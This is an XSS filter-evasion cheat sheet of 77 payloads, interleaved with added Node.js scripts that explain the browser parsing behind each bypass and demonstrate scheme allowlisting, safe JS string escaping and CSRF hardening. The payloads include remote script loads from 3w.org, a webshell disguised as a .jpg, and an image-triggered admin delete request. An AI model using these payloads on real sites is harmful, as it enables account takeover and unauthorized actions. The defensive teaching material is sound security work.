Cross-site image shell

XSS code: <script>alert("")</script>

Put the XSS code on the first line of the webshell, then change the shell's extension to .jpg. When the image-named shell is requested it still executes. This only holds where the server is configured to run .jpg files as script (a handler or include misconfiguration); a browser that renders the file as a real image will not execute anything in it.

(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using the javascript: directive, in the quoted, semicolon-terminated form that items 3 and 4 strip down
<IMG SRC="javascript:alert('XSS');">

(3) IMG tag, no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, the scheme is case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML entity encoding (decimal character references; in this form each one must end in a semicolon)
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) String.fromCharCode, no quotes needed (compute the codes with a character-code converter)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (decimal references; use a converter)
<IMG SRC=jav..omitted..S')>

(9) Zero-padded 7-digit UTF-8 Unicode encoding without semicolons (use a converter)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (use a converter)
<IMG SRC=java..omitted..XSS')>

(11) Embedded tab splitting "javascript" (the raw tab character appears as a space in this copy)
<IMG SRC="jav ascript:alert('XSS');">

(12) Embedded encoded tab
<IMG SRC="jav&#x09;ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav&#x0A;ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav&#x0D;ascript:alert('XSS');">

(15) Multi-line injected JavaScript, the extreme version of the same idea (the line breaks inside the tag were collapsed in this copy)
<IMG SRC="javascript:alert('XSS')">

(16) Working around a character limit (all the pieces must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null byte inside the scheme
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null byte inside the tag name. Null bytes are basically ineffective domestically, since there is nowhere to make use of them; both null-byte tricks depended on older browsers that silently dropped the NUL, and current HTML and URL parsers do not.
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the javascript: in an IMG tag
<IMG SRC=" javascript:alert('XSS');">
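
Why items (3) to (14) and (19) all get past the same naive filter becomes clear when the browser's two normalisation steps are run by hand. The Node.js script below is an added example, not part of the original cheat sheet: it decodes the attribute value the way the HTML tokenizer does (numeric character references with or without the trailing semicolon, plus the basic named ones), hands the result to Node's WHATWG-compliant global URL, which strips tabs and newlines and trims leading spaces exactly as a browser does, and compares a substring check on the raw attribute with a decode-then-parse-then-allowlist check. The base URL http://example.com/ and the allowlist of http: and https: are assumptions.

```javascript
// Added example (not from the original cheat sheet): how a browser turns the
// IMG SRC payloads above into a javascript: navigation, and why filtering the
// raw attribute text fails. Assumptions: base URL http://example.com/ for
// relative resolution; only numeric and five basic named references decoded.

const NAMED = { amp: "&", lt: "<", gt: ">", quot: '"', apos: "'" };

// Step 1: the HTML tokenizer decodes character references inside attribute
// values. Numeric references decode even without the trailing ";" (items 9
// and 10 rely on that), digits are consumed greedily and leading zeros are
// ignored (item 9's &#0000106 form).
function decodeAttribute(value) {
  return value
    .replace(/&#(x[0-9a-f]+|[0-9]+);?/gi, (_, num) => {
      const cp = /^x/i.test(num) ? parseInt(num.slice(1), 16) : parseInt(num, 10);
      return String.fromCodePoint(cp);
    })
    .replace(/&(amp|lt|gt|quot|apos);/g, (_, name) => NAMED[name]);
}

// Step 2: the URL parser removes every ASCII tab, LF and CR from the input,
// trims leading/trailing C0 controls and spaces, and lower-cases the scheme.
// Node's global URL follows the WHATWG URL Standard as the browsers do.
// Returns the effective scheme, or null if the value does not parse at all.
function effectiveScheme(rawAttr, base = "http://example.com/") {
  try {
    return new URL(decodeAttribute(rawAttr), base).protocol;
  } catch (e) {
    return null;
  }
}

// The check these payloads are written to defeat: a substring match on the
// raw attribute before the browser has decoded anything.
function naiveFilterBlocks(rawAttr) {
  return /javascript:/i.test(rawAttr);
}

// The check that holds up: decode, parse, then allowlist the scheme.
const ALLOWED_SCHEMES = new Set(["http:", "https:"]);
function schemeAllowed(rawAttr) {
  const scheme = effectiveScheme(rawAttr);
  return scheme !== null && ALLOWED_SCHEMES.has(scheme);
}

// Attribute values constructed from the items above.
const PAYLOADS = {
  "(3) no quotes": "javascript:alert('XSS')",
  "(4) mixed case": "JaVaScRiPt:alert('XSS')",
  "(5) decimal refs": "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert('XSS')",
  "(9) padded, no ;": "&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058alert('XSS')",
  "(10) hex, no ;": "&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A;alert('XSS')",
  "(11) raw tab": "jav\tascript:alert('XSS');",
  "(12) encoded tab": "jav&#x09;ascript:alert('XSS');",
  "(13) newline": "jav&#x0A;ascript:alert('XSS');",
  "(14) carriage return": "jav&#x0D;ascript:alert('XSS');",
  "(19) leading space": " javascript:alert('XSS');",
};

// Two look-alikes that a current parser does NOT turn into javascript:: a
// plain space inside the scheme, and the NUL byte of item (17). Both fall
// back to a relative path under the base URL.
const NOT_JAVASCRIPT = {
  "plain space": "jav ascript:alert('XSS')",
  "(17) NUL byte": "java\0script:alert('XSS')",
};

function audit(table) {
  const rows = {};
  for (const [name, value] of Object.entries(table)) {
    rows[name] = {
      scheme: effectiveScheme(value),
      naiveBlocks: naiveFilterBlocks(value),
      allowed: schemeAllowed(value),
    };
  }
  return rows;
}

console.table(audit(PAYLOADS));
console.table(audit(NOT_JAVASCRIPT));
```

Every entry in PAYLOADS comes out with scheme javascript:, and the substring check catches only the three that spell the word out; the allowlist check rejects all ten. The two NOT_JAVASCRIPT inputs show the boundary: a plain space and a NUL are not stripped by a current parser, which is why the null-byte entries only ever worked in older browsers.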
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS, take 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS, take 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Extra open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and a few other browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag, take 2 (protocol-relative source)
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons (regex literal)
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping the JavaScript escapes (the input lands inside a JS string whose double quotes are backslash-escaped but whose backslashes are not)
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
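
Item (29) only works against a specific server-side mistake: the input is written into a JavaScript string literal and the server escapes the double quote but not the backslash, so the attacker supplies the backslash and the server's own \" becomes \\" (an escaped backslash followed by a live quote). Item (30) is the HTML-side cousin: the HTML parser ends a <title> or <script> element at the first close tag no matter what the JavaScript quoting state is. The Node.js script below is an added example, not from the original cheat sheet; it renders both payloads through a naive template and a hardened one and executes the result with alert replaced by a spy. The variable name and the template shape are assumptions.

```javascript
// Added example (not from the original cheat sheet): the server-side bug that
// item (29) exploits and a serialiser that closes it. The template shape and
// the variable name `name` are assumptions.

// The bug: only the double quote is escaped. A leading backslash in the input
// turns the server's \" into \\" (escaped backslash, then a live quote).
function naiveEscape(s) {
  return s.replace(/"/g, '\\"');
}
function renderNaive(userInput) {
  return `var name = "${naiveEscape(userInput)}";`;
}

// The fix: JSON.stringify escapes backslash, quote and control characters;
// the extra replacements keep "</script>" and the HTML-significant characters
// out of the inline script (item 30's close-tag trick) and neutralise the two
// Unicode line terminators that JSON leaves unescaped.
function jsStringLiteral(s) {
  return JSON.stringify(s)
    .replace(/</g, "\\u003c")
    .replace(/>/g, "\\u003e")
    .replace(/&/g, "\\u0026")
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");
}
function renderSafe(userInput) {
  return `var name = ${jsStringLiteral(userInput)};`;
}

// Run the rendered statement with `alert` bound to a spy. Returns true if the
// injected alert fired, false if the input stayed inside the string (or the
// script did not parse at all, which is also "nothing ran").
function injectedCodeRuns(js) {
  let fired = false;
  try {
    new Function("alert", js)(() => { fired = true; });
  } catch (e) {
    // SyntaxError: the statement did not parse, so nothing executed.
  }
  return fired;
}

// Item (29)'s payload exactly as typed:  \";alert('XSS');//
const PAYLOAD_29 = "\\\";alert('XSS');//";
// Item (30)'s idea applied to a script context.
const PAYLOAD_30 = "</script><script>alert('XSS')</script>";

function demo() {
  return {
    naiveSource: renderNaive(PAYLOAD_29),
    naiveRuns: injectedCodeRuns(renderNaive(PAYLOAD_29)),
    safeSource: renderSafe(PAYLOAD_29),
    safeRuns: injectedCodeRuns(renderSafe(PAYLOAD_29)),
    naiveLeaksCloseTag: renderNaive(PAYLOAD_30).includes("</script>"),
    safeLeaksCloseTag: renderSafe(PAYLOAD_30).includes("</script>"),
  };
}

console.log(demo());
```

The naive template survives ordinary input such as O"Reilly, which is exactly why the bug goes unnoticed; only the leading backslash breaks it. The hardened version also never emits a literal </script>, so the item (30) style close-tag breakout has nothing to close.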
(31) INPUT image
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">

(32) BODY image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag with an onload handler (the handler attribute was stripped in this copy)
<BODY ONLOAD=alert('XSS')>

(34) IMG DYNSRC
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG LOWSRC
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG with VBScript (IE only)
<IMG SRC='vbscript:msgbox("XSS")'>

(41) META refresh to a javascript: URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) IFRAME
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) FRAME
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) TABLE
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with an extra character before javascript: (any of code points 1-32, 34, 39, 160, 8192-8203, 12288 and 65279 works; the control character shows as a space here)
<DIV STYLE="background-image: url( javascript:alert('XSS'))">

(48) DIV with a CSS expression (IE only)
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with the expression split up
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous tag with a STYLE attribute (anything starting with an open angle bracket and a letter parses as a tag)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE with expression (only the tail of the payload survived in this copy)
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag: you can embed a Flash movie that carries the XSS
<EMBED SRC="http://3w.org/XSS/xss.swf"></EMBED>

(56) ActionScript inside the Flash movie can smuggle in the XSS
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);

(57) XML namespace; the .HTC file must sit on the same server as your XSS vector
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JS is filtered, you can put the JS code inside an image file and load that as the script source (the image URL is blank in this copy)
<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded command. The browser fetches the image URL with the victim's cookies attached, so a GET request that performs an action runs with the victim's privileges; this is request forgery against the target site, not arbitrary command execution on the server.
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded command, take 2 (a.jpg is on your own server; this Apache Redirect turns the innocent-looking image fetch into the admin request)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

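Items (59) and (60) work because the browser sends the victim's cookies with the image fetch, and after a 302 it sends them to the redirected-to site as well. The Node.js script below is an added example, not from the original cheat sheet: it models the request the target receives from the image fetch, a vulnerable handler that acts on any cookie-bearing GET, and a hardened handler that requires a POST, a same-origin initiator (Fetch Metadata and Origin headers) and a per-session token. The route /admin.asp comes from item (60); the cookie and token values, the request objects and the Fetch Metadata values of a cross-site image fetch (Sec-Fetch-Dest: image, Sec-Fetch-Mode: no-cors, Sec-Fetch-Site: cross-site) are constructed samples.

```javascript
// Added example (not from the original cheat sheet): the request produced by
// items (59)/(60) as the target server sees it, a handler that falls for it
// and one that does not. Request objects, cookie and token values are
// constructed; /admin.asp is the route named in item (60).

const TARGET_ORIGIN = "http://www.XXX.com";
const SESSION = "victim-session";
const CSRF_TOKEN = "token-for-" + SESSION; // would be generated per session

// Vulnerable: any GET carrying a valid session cookie performs the action.
// The browser attaches that cookie to the <IMG SRC> fetch, and again to the
// request that follows the 302 from a.jpg, so the victim performs it.
function vulnerableAdmin(req) {
  if (req.cookies.session !== SESSION) return { status: 401, action: null };
  if (req.path === "/admin.asp" && "deleteuser" in req.query) {
    return { status: 200, action: "deleteuser" };
  }
  return { status: 404, action: null };
}

// Hardened: state changes need POST, an initiator proven same-origin by the
// Fetch Metadata and Origin headers, and the per-session token in the body.
// An <img> fetch can never satisfy this: it is a GET, it carries
// Sec-Fetch-Site: cross-site (still so after a cross-site redirect), and the
// attacker's page cannot read the token.
function hardenedAdmin(req) {
  if (req.cookies.session !== SESSION) return { status: 401, action: null };
  if (req.method !== "POST") return { status: 405, action: null };
  const site = req.headers["sec-fetch-site"];
  if (site !== undefined && site !== "same-origin") return { status: 403, action: null };
  if (req.headers["origin"] !== TARGET_ORIGIN) return { status: 403, action: null };
  if (req.body.csrf !== CSRF_TOKEN) return { status: 403, action: null };
  if (req.path === "/admin.asp" && req.body.action === "deleteuser") {
    return { status: 200, action: "deleteuser" };
  }
  return { status: 404, action: null };
}

// What <IMG SRC="http://www.XXX.com/admin.asp?deleteuser=1"> on an attacker
// page sends (constructed sample; same shape after the 302 of item 60).
const IMG_FETCH = {
  method: "GET",
  path: "/admin.asp",
  query: { deleteuser: "1" },
  body: {},
  cookies: { session: SESSION },
  headers: {
    "sec-fetch-dest": "image",
    "sec-fetch-mode": "no-cors",
    "sec-fetch-site": "cross-site",
  },
};

// The legitimate admin submitting the site's own form (constructed sample).
const FORM_POST = {
  method: "POST",
  path: "/admin.asp",
  query: {},
  body: { action: "deleteuser", csrf: CSRF_TOKEN },
  cookies: { session: SESSION },
  headers: {
    origin: TARGET_ORIGIN,
    "sec-fetch-dest": "document",
    "sec-fetch-mode": "navigate",
    "sec-fetch-site": "same-origin",
  },
};

function demo() {
  return {
    imgAgainstVulnerable: vulnerableAdmin(IMG_FETCH),
    imgAgainstHardened: hardenedAdmin(IMG_FETCH),
    formAgainstHardened: hardenedAdmin(FORM_POST),
  };
}

console.log(demo());
```

Browsers that predate Fetch Metadata send no Sec-Fetch-Site header, which is why the hardened handler treats its absence as "unknown" and still relies on the Origin check and the token rather than on the header alone.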
(61) Bypassing symbol filters (a filter that stops at the first ">" sees only the bogus attribute)
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67) Splitting the tag name across a document.write
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>

(68) URL evasion: IP address instead of hostname
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding (percent-encoded hostname)
<A HREF="http://%33%77%2E%6F%72%67">XSS</A>

(70) Dword IP
<A HREF="http://3232235521">XSS</A>

(71) Hex IP
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) Octal IP
<A HREF="http://0300.0250.0000.0001">XSS</A>

Items 70 to 72 are three spellings of the same address, 192.168.0.1; the browser's host parser accepts all of them.

(73) Mixed encoding (a newline and tabs inside the scheme and host; shown here as a line break and spaces; 66.000146.0x7.147 is 66.102.7.147)
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>

(74) Dropping the "http:"
<A HREF="//www.google.com/">XSS</A>

(75) Dropping the "www"
<A HREF="http://google.com/">XSS</A>

(76) Absolute DNS name with a trailing dot
<A HREF="http://www.google.com./">XSS</A>

(77) javascript: link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
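
Items (68) to (76) are all one destination once the browser's URL parser has normalised the host, which is why a check on the raw href string is bypassed. The Node.js script below is an added example, not from the original cheat sheet: it runs each href through Node's WHATWG-compliant global URL (tabs and newlines removed, IPv4 parts read as decimal, 0x-hex or 0-octal, a lone number treated as a 32-bit address, trailing dot preserved) and compares a prefix check on the raw string with a check on the canonical host. The disallowed prefix http://www.google.com/, the deny list of hosts, and the page URL http://example.com/ used to resolve item (74) are assumptions.

```javascript
// Added example (not from the original cheat sheet): items (68)-(76) are the
// same destination once the browser's URL parser has normalised the host, so
// a filter that inspects the raw href string is bypassed. Node's global URL
// implements the WHATWG URL Standard the browsers use. The disallowed prefix,
// the deny list and the page URL are assumptions.

const DENIED_URL_PREFIX = "http://www.google.com/";
const DENIED_HOSTS = ["google.com", "66.102.7.147", "192.168.0.1"];

// Host as the browser would actually connect to it, or null if it does not
// parse. A scheme-less href (item 74) resolves against the page URL.
function canonicalHost(href, pageUrl = "http://example.com/") {
  try {
    return new URL(href, pageUrl).hostname;
  } catch (e) {
    return null;
  }
}

// The filter the items are written to defeat: "http://www.google.com/ is
// programmatically disallowed" as a prefix match on the raw string.
function rawStringBlocked(href) {
  return href.toLowerCase().startsWith(DENIED_URL_PREFIX);
}

// The filter that survives them: parse first, compare the canonical host,
// treat a trailing dot (item 76) as the same name, match subdomains, and fail
// closed on anything that does not parse.
function canonicalHostBlocked(href) {
  const host = canonicalHost(href);
  if (host === null) return true;
  const name = host.endsWith(".") ? host.slice(0, -1) : host;
  return DENIED_HOSTS.some((d) => name === d || name.endsWith("." + d));
}

// hrefs constructed from the items above; item 73's newline and tabs are
// written out as \n and \t.
const HREFS = {
  "(70) dword": "http://3232235521",
  "(71) hex": "http://0xc0.0xa8.0x00.0x01",
  "(72) octal": "http://0300.0250.0000.0001",
  "(73) mixed": "h\ntt\tp://6\t6.000146.0x7.147/",
  "(74) no scheme": "//www.google.com/",
  "(75) no www": "http://google.com/",
  "(76) trailing dot": "http://www.google.com./",
};

function audit() {
  const rows = {};
  for (const [item, href] of Object.entries(HREFS)) {
    rows[item] = {
      host: canonicalHost(href),
      rawBlocked: rawStringBlocked(href),
      canonicalBlocked: canonicalHostBlocked(href),
    };
  }
  return rows;
}

console.table(audit());
```

The table shows every href slipping past the prefix check and every one being caught once the host has been canonicalised; the three IP spellings collapse to 192.168.0.1 and the mixed-encoding one to 66.102.7.147. The same parse-then-compare rule is what a server-side redirect or link allowlist has to apply, since the raw string is never what the browser connects to.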